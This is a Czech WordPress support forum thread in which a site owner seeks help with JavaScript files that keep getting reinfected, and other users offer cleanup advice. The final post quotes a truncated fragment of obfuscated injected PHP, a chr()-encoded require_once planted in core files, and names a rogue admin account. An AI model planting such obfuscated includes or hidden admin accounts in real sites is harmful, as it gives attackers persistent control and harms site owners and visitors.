Úvodní stránka › Fórum podpory WordPressu › Problémy s WordPressem › WordPress – opakovaně napadené JS soubory
Štítky: bezpečnost, Malware, Sucuri, Vir, Wordfence Security
Zvolené téma obsahuje celkem 14 odpovědí. Do diskuze (3 účastníci) se naposledy zapojil uživatel hlavka a poslední změna je stará 8 let, 9 měsíců.
-
AutorPříspěvky
-
24. února 2016 (11:29) #26697
Dobrý den,
mohl bych poprosit o radu jak zabezpečit web na WP?
Zhruba cca 3 týdny řešíme problémy, kdy se nám na webu zavirují kompletně všechny JS soubory. Nevím jak to přesně popsat, ale v každém JS souboru je na konci vždy řetězec začínající komentářem a pak x stovek dalších znaků.
Šablonu používáme vlastní. Pluginů máme cca 8 a to opravdu jen ty pravidelně aktualizované a s vyšším hodnocením. Přes Wp-config.php máme zakázanou editaci zdrojových kódů přes Wp admina, změněné prefixy v tabulkách.
Vyzkoušeli jsme i přesun webu k jinému poskytovateli, konkrétně tedy wedos, ale i přesto byl web znovu napaden.
Museli jsme tedy opět provést čistou instalaci WP a pluginů + vyčištění JS souborů v šabloně.
Popravdě vůbec nevím jak se tomu v budoucnu bránit aby se již nic podobného neopakovalo. Jelikož pokud takovému napadení dojde, Chrome a jiné prohlížeče tento web zablokují červeným varovným oknem s informací, že na webu je malware.
Nevíte jak se této situaci efektivně bránit? Díky moc za každou radu, která se vám pomohla.
24. února 2016 (13:38) #26705Patrně jste se stal obětí poměrně známého útoku, který začal probíhat cca před měsícem a dochází právě k napadení všech JavaScriptových souborů. Stačilo pokud jste třeba někdy v minulosti používal nějaký problematický plugin či šablonu a robot si zapamatoval bezpečnostní díru (případně si připravil zadní vrátka) a až nyní začal hromadně útočit.
Pokud už k napadení dojde, tak je třeba po vyčištění ještě provést následující:
– Změnit hesla (databáze, FTP, administrátoři).
– Zkontrolovat obsah databáze (zejména neznámé administrátory).
– Zkontrolovat, zda se na web nepřihlašuje uživatel, který má napadený počítač.Obecně je to ale častý problém, nedávno jsem se setkal s webem, který jsem čistil a opět byl napaden, i když zatím netuším, jak se tam mohl útočník znovu dostat :-) Ale tam nešlo o JavaScriptové soubory…
26. února 2016 (8:35) #26739Děkuji za informace.
Cca 5 dní byl teď klid, ale dnes ráno nám eset začal hlásit při příchodu na web: js/iframe.MO trojský kůň
viz. příloha
Když jsem procházel jednotlivé js soubory, které byly v minulosti napadeny, tak se vše tváří v pořádku a žádné řetězce tyto soubory neobsahují.
Nesetkal jste se někdo s tímto problémem?
Attachments:
26. února 2016 (9:07) #26741Příčina problému nemusí být přímo v JavaScriptových souborech umístěných na serveru, ale i někde jinde (načítané z jiného místa). Nebo že by prohlížeč načítal cachovanou podobu webu uloženou na počítači? Těžko říci, zkuste anonymní okno a prověřit web.
26. února 2016 (14:19) #26750Dobrý den,
po hlášce o malware na našem webu jsem smazal a poté obnovil obsah přes FTP, změnil hesla FTP, Webu a databáze. I poté Sucuri hlásí prolomení sítě. Po přihlášení/wp-login.php
mi hlásí: “Během připojování k databázovému serveru došlo k chybě” Je to možné díky změně hesla db? Stačí poté, co se dostanu do wordpressu zkontrolovat soubory antivirovým pluginem?
Děkuji za pomoc.26. února 2016 (14:30) #26751Aktualizoval jsi upravené heslo do DB i v souboru
wp-config.php
?26. února 2016 (14:38) #26753Přesně tak, jak píše @kuzmic11, změněné heslo se musí změnit i v konfiguračním souboru :-)
@hlavka: Pokud jste zajistil výše uvedené kroky, tak by mělo stačit pročistit FTP. Pokud se ale nákaza stále objevuje, tak jste patrně stále neodhalil pravou příčinu (může to být třeba i plugin či šablona) a bude se to patrně opakovat i do budoucna…
26. února 2016 (22:26) #26772Změnil jsem heslo v
wp-config.php
, ale po mé snaze se přihlásit stále hlásí “Během připojování k databázovému serveru došlo k chybě.”– Potřeboval bych se zřejmě dostat do administrace WP, abych deaktivoval pluginy, ale jak to udělat?
– Jak pročistit FTP? Antivirem pod Windows? (pracuji v OS Ubuntu).
Děkuji.
27. února 2016 (14:07) #26774@hlavka: Patrně máte v souboru
wp-config.php
stále něco špatně, zkontrolujte, zda heslo opravdu funguje, zkuste se třeba přihlásit přímo do databáze přes PHPMyAdmin.Do administrace se dostanete až opravíte připojení k databázi. Pluginy lze deaktivovat i natvrdo ručně, a to přejmenováním adresáře
wp-content/plugins
. Ale pokud nefunguje připojení k databázi, tak to asi bude stejně k ničemu…FTP asi nejlépe pročistít pomocí nějakého pluginu, např. Wordfence Security.
28. února 2016 (19:01) #26782Opravil jsem heslo v
wp-config.php
, dostal se do wordpressu, deaktivoval všechny pluginy, nainstaloval a zapnul wordfence, změnil své heslo. Nyní po spuštění stránky nehlásí malware, ale vůbec nic, stránka je prázdná (asi budu muset aktivovat nějaký plugin – ale jaký?). Co jde spustit bez problémů je poddoména. Ve wordfence běží Live Traffic ad. Děkuji za předchozí cenné rady a pokud budete vědět co dál budu vám oběma vděčný.28. února 2016 (22:32) #26784Dodávám, že zatímco Firefox nic nezobrazuje, G.Chrome stále hlásí stránku napadenou malware (možná stačí jen odhlásit pomocí formuláře?).
29. února 2016 (12:18) #26790Napadenou stránku by měl hlásit spíše nějaký antivir než prohlížeč? V prohlížeči Chrome asi pouze vidíte, co si o webu myslí vyhledávač Google? Můžete prosím přiložit screenshot? Pokud web identifikoval jako napadený, tak bude asi nějakou chvíli trvat než ho zase označí za čistý… Myslím, že tam bývá uveden i nějaký odkaz na opětovné posouzení webu? Web můžete zkontrolovat třeba zde, čímž zjistíte, zda je stále ještě nakažený.
29. února 2016 (13:47) #26792Dobrý den,
přikládám screenshoty Google Chrome, ze Sucuri. Ve WP byly poničené české znaky, přeinstaloval jsem tedy WP.
Kopie posledních řádků z Wordfence:
[Feb 28 21:32:30] Analyzed 1800 files containing 29.92 MB of data so far
[Feb 28 21:32:33] Analyzed 1900 files containing 33.16 MB of data so far
[Feb 28 21:32:35] Scan can’t continue – stored data not found after a fork. Got type: boolean
[Feb 28 23:56:35] Scheduled Wordfence scan starting at Sunday 28th of February 2016 11:56:35 PM
[Feb 29 00:48:37] Scheduled Wordfence scan starting at Monday 29th of February 2016 12:48:37 AMAttachments:
29. února 2016 (13:53) #26795Váš web musíte přidat do služby Google Webmaster tools. V navigaci zvolte: Bezpečnostní problémy. Zde uvidíte informaci od Googlu, že Váš byl napaden a proto se Vám zobrazuje v Chrome červené varovné okno z printscreenu. Je zde volba něco ve stylu: “Požádat o překontrolování”. Pokud máte web v pořádku většinou ještě ten den vám web odblokují.
14. dubna 2016 (22:01) #27289Dobrý den,
malware jsem díky Vám odstranil, ale trápí mě neustálá změna pěti souborů, kterou mi hlásí Worldfence (všechny ostatní pluginy jsem deaktivoval):
wp-includes/user.php, dtto taxonomy, post, load, class-wp – jsou do nich vloženy znaky, např. v user.php (část):
@require_once(“”.chr(47).””.””.””.””.””.”w”.””.””.””.””.””.chr(101).””.””.chr(98).””.””.
/*user.php */function wp_authenticate_cookie($user, $username, $password) {Dále se mi uhnizďuje nevítaný uživatel s administrátorskými právy:
wpupdatestream s adresou support@wpwhitesecurity.com a Worldfence hlásí:
Uživatel admin s uživatelským jménem wpupdatestream byl vytvořen mimo WordPress.
Děkuji -
AutorPříspěvky
Pokud chcete odpovědět na toto téma, musíte se nejdříve přihlásit.